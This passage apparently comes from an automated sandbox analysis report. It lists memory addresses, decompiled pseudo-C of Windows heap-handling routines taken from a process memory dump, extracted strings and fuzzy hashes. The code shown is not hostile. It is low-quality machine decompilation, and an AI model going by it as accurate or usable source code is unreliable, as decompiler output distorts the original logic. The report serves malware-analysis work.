                                                                                                                                                    0x030d3dba
                                                                                                                                                    0x030d3dba
                                                                                                                                                    0x030d3dd4
                                                                                                                                                    0x030d3e94
                                                                                                                                                    0x030d3eab
                                                                                                                                                    0x030d3f6d
                                                                                                                                                    0x030d3f84
                                                                                                                                                    0x030d406b
                                                                                                                                                    0x030d406b
                                                                                                                                                    0x030d406e
                                                                                                                                                    0x030d406e
                                                                                                                                                    0x030d4070
                                                                                                                                                    0x030d4074
                                                                                                                                                    0x03128351
                                                                                                                                                    0x03128351
                                                                                                                                                    0x030d407a
                                                                                                                                                    0x030d407f
                                                                                                                                                    0x0312835d
                                                                                                                                                    0x03128370
                                                                                                                                                    0x03128377
                                                                                                                                                    0x03128379
                                                                                                                                                    0x0312837c
                                                                                                                                                    0x0312837c
                                                                                                                                                    0x0312835d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d407f
                                                                                                                                                    0x030d3f8a
                                                                                                                                                    0x030d3f8d
                                                                                                                                                    0x030d3f90
                                                                                                                                                    0x030d3f95
                                                                                                                                                    0x0312830d
                                                                                                                                                    0x0312830f
                                                                                                                                                    0x030d3f9b
                                                                                                                                                    0x030d3fac
                                                                                                                                                    0x030d3fae
                                                                                                                                                    0x030d3fb1
                                                                                                                                                    0x030d3fb1
                                                                                                                                                    0x030d3fb6
                                                                                                                                                    0x03128317
                                                                                                                                                    0x0312831a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d3fbc
                                                                                                                                                    0x030d3fc1
                                                                                                                                                    0x030d3fc9
                                                                                                                                                    0x030d3fd7
                                                                                                                                                    0x030d3fda
                                                                                                                                                    0x030d3fdd
                                                                                                                                                    0x030d4021
                                                                                                                                                    0x030d4021
                                                                                                                                                    0x030d4029
                                                                                                                                                    0x030d4030
                                                                                                                                                    0x030d4044
                                                                                                                                                    0x030d4046
                                                                                                                                                    0x030d4046
                                                                                                                                                    0x030d4044
                                                                                                                                                    0x030d4049
                                                                                                                                                    0x03128327
                                                                                                                                                    0x03128334
                                                                                                                                                    0x03128339
                                                                                                                                                    0x0312833c
                                                                                                                                                    0x030d404f
                                                                                                                                                    0x030d404f
                                                                                                                                                    0x030d404f
                                                                                                                                                    0x030d4051
                                                                                                                                                    0x030d4056
                                                                                                                                                    0x030d4063
                                                                                                                                                    0x030d4063
                                                                                                                                                    0x030d4068
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d4068
                                                                                                                                                    0x030d3fdf
                                                                                                                                                    0x030d3fe2
                                                                                                                                                    0x030d3fe4
                                                                                                                                                    0x030d3fe7
                                                                                                                                                    0x030d3fef
                                                                                                                                                    0x030d4003
                                                                                                                                                    0x030d4005
                                                                                                                                                    0x030d4005
                                                                                                                                                    0x030d400c
                                                                                                                                                    0x030d4013
                                                                                                                                                    0x030d4016
                                                                                                                                                    0x030d4017
                                                                                                                                                    0x030d401b
                                                                                                                                                    0x030d401e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d401e
                                                                                                                                                    0x030d3fb6
                                                                                                                                                    0x030d3eb1
                                                                                                                                                    0x030d3eb4
                                                                                                                                                    0x030d3eb7
                                                                                                                                                    0x030d3ebc
                                                                                                                                                    0x031282a9
                                                                                                                                                    0x031282ab
                                                                                                                                                    0x030d3ec2
                                                                                                                                                    0x030d3ed3
                                                                                                                                                    0x030d3ed5
                                                                                                                                                    0x030d3ed8
                                                                                                                                                    0x030d3ed8
                                                                                                                                                    0x030d3edd
                                                                                                                                                    0x031282b3
                                                                                                                                                    0x031282b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d3ee3
                                                                                                                                                    0x030d3ee8
                                                                                                                                                    0x030d3eed
                                                                                                                                                    0x030d3ef0
                                                                                                                                                    0x030d3ef3
                                                                                                                                                    0x030d3f02
                                                                                                                                                    0x030d3f05
                                                                                                                                                    0x030d3f08
                                                                                                                                                    0x031282c0
                                                                                                                                                    0x031282c3
                                                                                                                                                    0x031282c5
                                                                                                                                                    0x031282c8
                                                                                                                                                    0x031282d0
                                                                                                                                                    0x031282e4
                                                                                                                                                    0x031282e6
                                                                                                                                                    0x031282e6
                                                                                                                                                    0x031282ed
                                                                                                                                                    0x031282f4
                                                                                                                                                    0x031282f7
                                                                                                                                                    0x031282f8
                                                                                                                                                    0x031282fc
                                                                                                                                                    0x031282ff
                                                                                                                                                    0x031282ff
                                                                                                                                                    0x030d3f0e
                                                                                                                                                    0x030d3f11
                                                                                                                                                    0x030d3f16
                                                                                                                                                    0x030d3f1d
                                                                                                                                                    0x030d3f31
                                                                                                                                                    0x03128307
                                                                                                                                                    0x03128307
                                                                                                                                                    0x030d3f31
                                                                                                                                                    0x030d3f39
                                                                                                                                                    0x030d3f48
                                                                                                                                                    0x030d3f4d
                                                                                                                                                    0x030d3f50
                                                                                                                                                    0x030d3f50
                                                                                                                                                    0x030d3f53
                                                                                                                                                    0x030d3f58
                                                                                                                                                    0x030d3f65
                                                                                                                                                    0x030d3f65
                                                                                                                                                    0x030d3f6a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d3f6a
                                                                                                                                                    0x030d3edd
                                                                                                                                                    0x030d3dda
                                                                                                                                                    0x030d3ddd
                                                                                                                                                    0x030d3de0
                                                                                                                                                    0x030d3de5
                                                                                                                                                    0x03128245
                                                                                                                                                    0x030d3deb
                                                                                                                                                    0x030d3df7
                                                                                                                                                    0x030d3dfc
                                                                                                                                                    0x030d3dfe
                                                                                                                                                    0x030d3e01
                                                                                                                                                    0x030d3e01
                                                                                                                                                    0x030d3e06
                                                                                                                                                    0x0312824d
                                                                                                                                                    0x0312824f
                                                                                                                                                    0x03128254
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d3e0c
                                                                                                                                                    0x030d3e11
                                                                                                                                                    0x030d3e16
                                                                                                                                                    0x030d3e19
                                                                                                                                                    0x030d3e29
                                                                                                                                                    0x030d3e2c
                                                                                                                                                    0x030d3e2f
                                                                                                                                                    0x0312825c
                                                                                                                                                    0x0312825f
                                                                                                                                                    0x03128261
                                                                                                                                                    0x03128264
                                                                                                                                                    0x0312826c
                                                                                                                                                    0x03128280
                                                                                                                                                    0x03128282
                                                                                                                                                    0x03128282
                                                                                                                                                    0x03128289
                                                                                                                                                    0x03128290
                                                                                                                                                    0x03128293
                                                                                                                                                    0x03128294
                                                                                                                                                    0x03128298
                                                                                                                                                    0x0312829b
                                                                                                                                                    0x0312829b
                                                                                                                                                    0x030d3e35
                                                                                                                                                    0x030d3e38
                                                                                                                                                    0x030d3e3d
                                                                                                                                                    0x030d3e44
                                                                                                                                                    0x030d3e58
                                                                                                                                                    0x031282a3
                                                                                                                                                    0x031282a3
                                                                                                                                                    0x030d3e58
                                                                                                                                                    0x030d3e60
                                                                                                                                                    0x030d3e6f
                                                                                                                                                    0x030d3e74
                                                                                                                                                    0x030d3e77
                                                                                                                                                    0x030d3e77
                                                                                                                                                    0x030d3e7a
                                                                                                                                                    0x030d3e7f
                                                                                                                                                    0x030d3e8c
                                                                                                                                                    0x030d3e8c
                                                                                                                                                    0x030d3e91
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d3e91

                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 030D3D8C
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 030D3E97
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 030D3D6F
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 030D3F70
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 030D3DC0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 0-258546922
                                                                                                                                                    • Opcode ID: 0837a9e29ab8a3e02a28213d88ad47629f22babe53471258405975e243bfe84a
                                                                                                                                                    • Instruction ID: 69e4145713a8386c17e9dc5ec13e23ad8b88bb6edb5417f01df2b08831a9dca2
                                                                                                                                                    • Opcode Fuzzy Hash: 0837a9e29ab8a3e02a28213d88ad47629f22babe53471258405975e243bfe84a
                                                                                                                                                    • Instruction Fuzzy Hash: F6F15A7AD01718EFCB15DF99D980AEEFBF9EF48650F14006AE505AB250DB749E01CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                    			E030C40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E030CB150();
					} else {
						E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E030CB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E030CB150(", passed to %s", _t29);
					}
					_push("\n");
					E030CB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x31b6378 = 1;
						asm("int3");
						 *0x31b6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                                                                    0x030c40e6
                                                                                                                                                    0x030c40e8
                                                                                                                                                    0x030c40f1
                                                                                                                                                    0x0312042d
                                                                                                                                                    0x0312044c
                                                                                                                                                    0x03120451
                                                                                                                                                    0x0312042f
                                                                                                                                                    0x03120444
                                                                                                                                                    0x03120449
                                                                                                                                                    0x0312045d
                                                                                                                                                    0x03120466
                                                                                                                                                    0x0312046e
                                                                                                                                                    0x03120474
                                                                                                                                                    0x03120475
                                                                                                                                                    0x0312047a
                                                                                                                                                    0x0312048a
                                                                                                                                                    0x0312048c
                                                                                                                                                    0x03120493
                                                                                                                                                    0x03120494
                                                                                                                                                    0x03120494
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312049b
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                                                                    • API String ID: 0-188067316
                                                                                                                                                    • Opcode ID: 14595091da5b4d90d6fecd8185a0dd610aabe49171e5406f9c338f3000dc0d16
                                                                                                                                                    • Instruction ID: 779e059767419ba6c3b6925c23620b2d860d42183a7b04dc4afc415745d10d7e
                                                                                                                                                    • Opcode Fuzzy Hash: 14595091da5b4d90d6fecd8185a0dd610aabe49171e5406f9c338f3000dc0d16
                                                                                                                                                    • Instruction Fuzzy Hash: 86012D362226D49FD229D7ACF40EF997BB8DB88B30F1D805DF41B4F641CBA55484C520
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                    			E030EA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x31b8748 - 1;
					if( *0x31b8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E030CB150();
									_t260 = _t257 + 4;
								} else {
									E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E030CB150();
								_t257 = _t260 + 4;
								__eflags =  *0x31b7bc8;
								if(__eflags == 0) {
									E03182073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0318A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0311D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E030EAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0318A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0318A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x31b8748 - 1;
					if( *0x31b8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E030CB150();
							} else {
								E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E030CB150();
							__eflags =  *0x31b7bc8;
							if(__eflags == 0) {
								_t131 = E03182073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                                                                                                    0x030ea83a
                                                                                                                                                    0x030ea83c
                                                                                                                                                    0x030ea83e
                                                                                                                                                    0x030ea841
                                                                                                                                                    0x030ea844
                                                                                                                                                    0x030ea84a
                                                                                                                                                    0x030eaa53
                                                                                                                                                    0x030eaa59
                                                                                                                                                    0x030eaa59
                                                                                                                                                    0x030ea858
                                                                                                                                                    0x030ea85e
                                                                                                                                                    0x030eaaf5
                                                                                                                                                    0x030eaafc
                                                                                                                                                    0x0313229e
                                                                                                                                                    0x031322a2
                                                                                                                                                    0x031322a8
                                                                                                                                                    0x031322b3
                                                                                                                                                    0x031322b5
                                                                                                                                                    0x031322bb
                                                                                                                                                    0x031322c1
                                                                                                                                                    0x031322c5
                                                                                                                                                    0x031322e6
                                                                                                                                                    0x031322eb
                                                                                                                                                    0x031322f0
                                                                                                                                                    0x031322c7
                                                                                                                                                    0x031322dc
                                                                                                                                                    0x031322e1
                                                                                                                                                    0x031322e1
                                                                                                                                                    0x031322f3
                                                                                                                                                    0x031322f8
                                                                                                                                                    0x031322fd
                                                                                                                                                    0x03132300
                                                                                                                                                    0x03132307
                                                                                                                                                    0x0313230e
                                                                                                                                                    0x0313230e
                                                                                                                                                    0x03132313
                                                                                                                                                    0x03132313
                                                                                                                                                    0x031322b5
                                                                                                                                                    0x031322a2
                                                                                                                                                    0x030eaafc
                                                                                                                                                    0x030ea864
                                                                                                                                                    0x030ea869
                                                                                                                                                    0x030eaa5c
                                                                                                                                                    0x030eaa5e
                                                                                                                                                    0x030ea86f
                                                                                                                                                    0x030ea87f
                                                                                                                                                    0x030ea885
                                                                                                                                                    0x030ea885
                                                                                                                                                    0x030ea88b
                                                                                                                                                    0x030ea890
                                                                                                                                                    0x030ea896
                                                                                                                                                    0x030eab0c
                                                                                                                                                    0x030eab0f
                                                                                                                                                    0x030eab15
                                                                                                                                                    0x03132320
                                                                                                                                                    0x03132320
                                                                                                                                                    0x030eab1b
                                                                                                                                                    0x030ea89c
                                                                                                                                                    0x030ea89f
                                                                                                                                                    0x030ea8a2
                                                                                                                                                    0x030ea8a2
                                                                                                                                                    0x030ea8a5
                                                                                                                                                    0x030ea8af
                                                                                                                                                    0x030ea8b3
                                                                                                                                                    0x030ea8b8
                                                                                                                                                    0x030eaa66
                                                                                                                                                    0x030ea8be
                                                                                                                                                    0x030ea8c5
                                                                                                                                                    0x030ea8c6
                                                                                                                                                    0x030ea8ce
                                                                                                                                                    0x03132328
                                                                                                                                                    0x03132332
                                                                                                                                                    0x03132337
                                                                                                                                                    0x03132337
                                                                                                                                                    0x030ea8ce
                                                                                                                                                    0x030ea8d4
                                                                                                                                                    0x030ea8d8
                                                                                                                                                    0x030ea8db
                                                                                                                                                    0x030ea8de
                                                                                                                                                    0x030ea8e1
                                                                                                                                                    0x030ea8e5
                                                                                                                                                    0x030ea8e8
                                                                                                                                                    0x030ea8f0
                                                                                                                                                    0x030ea8f3
                                                                                                                                                    0x0313234c
                                                                                                                                                    0x03132350
                                                                                                                                                    0x03132355
                                                                                                                                                    0x03132359
                                                                                                                                                    0x03132359
                                                                                                                                                    0x030ea8f9
                                                                                                                                                    0x030ea901
                                                                                                                                                    0x030eaae4
                                                                                                                                                    0x030eaae4
                                                                                                                                                    0x030eaaea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea907
                                                                                                                                                    0x030ea90a
                                                                                                                                                    0x030ea91d
                                                                                                                                                    0x030ea91d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea910
                                                                                                                                                    0x030ea910
                                                                                                                                                    0x030ea910
                                                                                                                                                    0x030ea914
                                                                                                                                                    0x030ea924
                                                                                                                                                    0x030ea924
                                                                                                                                                    0x030ea924
                                                                                                                                                    0x030ea924
                                                                                                                                                    0x030ea916
                                                                                                                                                    0x030ea91b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea91b
                                                                                                                                                    0x030ea925
                                                                                                                                                    0x030ea925
                                                                                                                                                    0x030ea932
                                                                                                                                                    0x030ea936
                                                                                                                                                    0x030ea93c
                                                                                                                                                    0x030ea93c
                                                                                                                                                    0x030ea93c
                                                                                                                                                    0x030eab22
                                                                                                                                                    0x030eab24
                                                                                                                                                    0x030eab27
                                                                                                                                                    0x030eab27
                                                                                                                                                    0x030ea942
                                                                                                                                                    0x030ea944
                                                                                                                                                    0x030eaaba
                                                                                                                                                    0x030eaabd
                                                                                                                                                    0x030eaac0
                                                                                                                                                    0x030eaac0
                                                                                                                                                    0x030eaac2
                                                                                                                                                    0x030eab2f
                                                                                                                                                    0x030eaac4
                                                                                                                                                    0x030eaac4
                                                                                                                                                    0x030eaac7
                                                                                                                                                    0x030eaaca
                                                                                                                                                    0x030eaacc
                                                                                                                                                    0x030eaace
                                                                                                                                                    0x030eaace
                                                                                                                                                    0x030eaace
                                                                                                                                                    0x030eaad1
                                                                                                                                                    0x030eaad1
                                                                                                                                                    0x030eaad7
                                                                                                                                                    0x030eaad9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03132361
                                                                                                                                                    0x03132369
                                                                                                                                                    0x0313236b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03132371
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03132371
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313236b
                                                                                                                                                    0x030eaac0
                                                                                                                                                    0x030ea94a
                                                                                                                                                    0x030ea94a
                                                                                                                                                    0x030ea94d
                                                                                                                                                    0x030ea94d
                                                                                                                                                    0x030ea950
                                                                                                                                                    0x030ea954
                                                                                                                                                    0x03132376
                                                                                                                                                    0x03132380
                                                                                                                                                    0x030ea95a
                                                                                                                                                    0x030ea95a
                                                                                                                                                    0x030ea95c
                                                                                                                                                    0x030ea95f
                                                                                                                                                    0x030ea961
                                                                                                                                                    0x030ea961
                                                                                                                                                    0x030ea967
                                                                                                                                                    0x030ea96a
                                                                                                                                                    0x030ea972
                                                                                                                                                    0x030eaa02
                                                                                                                                                    0x030eaa06
                                                                                                                                                    0x030eaa10
                                                                                                                                                    0x030eaa16
                                                                                                                                                    0x030eaa16
                                                                                                                                                    0x030eaa1b
                                                                                                                                                    0x030eaa21
                                                                                                                                                    0x030eaa24
                                                                                                                                                    0x030eaa27
                                                                                                                                                    0x030eaa29
                                                                                                                                                    0x030eaa2c
                                                                                                                                                    0x030eaa32
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea978
                                                                                                                                                    0x030ea978
                                                                                                                                                    0x030ea97b
                                                                                                                                                    0x030ea981
                                                                                                                                                    0x030ea996
                                                                                                                                                    0x030ea998
                                                                                                                                                    0x030ea99f
                                                                                                                                                    0x030ea9a2
                                                                                                                                                    0x0313238a
                                                                                                                                                    0x030ea9a8
                                                                                                                                                    0x030ea9a8
                                                                                                                                                    0x030ea9a8
                                                                                                                                                    0x030ea9aa
                                                                                                                                                    0x030ea9ad
                                                                                                                                                    0x030ea9b0
                                                                                                                                                    0x030ea9bb
                                                                                                                                                    0x030ea9be
                                                                                                                                                    0x030ea9c7
                                                                                                                                                    0x030ea9c9
                                                                                                                                                    0x030ea9c9
                                                                                                                                                    0x030ea9cc
                                                                                                                                                    0x030ea9d1
                                                                                                                                                    0x030eaa6d
                                                                                                                                                    0x030eaa70
                                                                                                                                                    0x030eaa73
                                                                                                                                                    0x030eaa75
                                                                                                                                                    0x030eaa79
                                                                                                                                                    0x030eaa7e
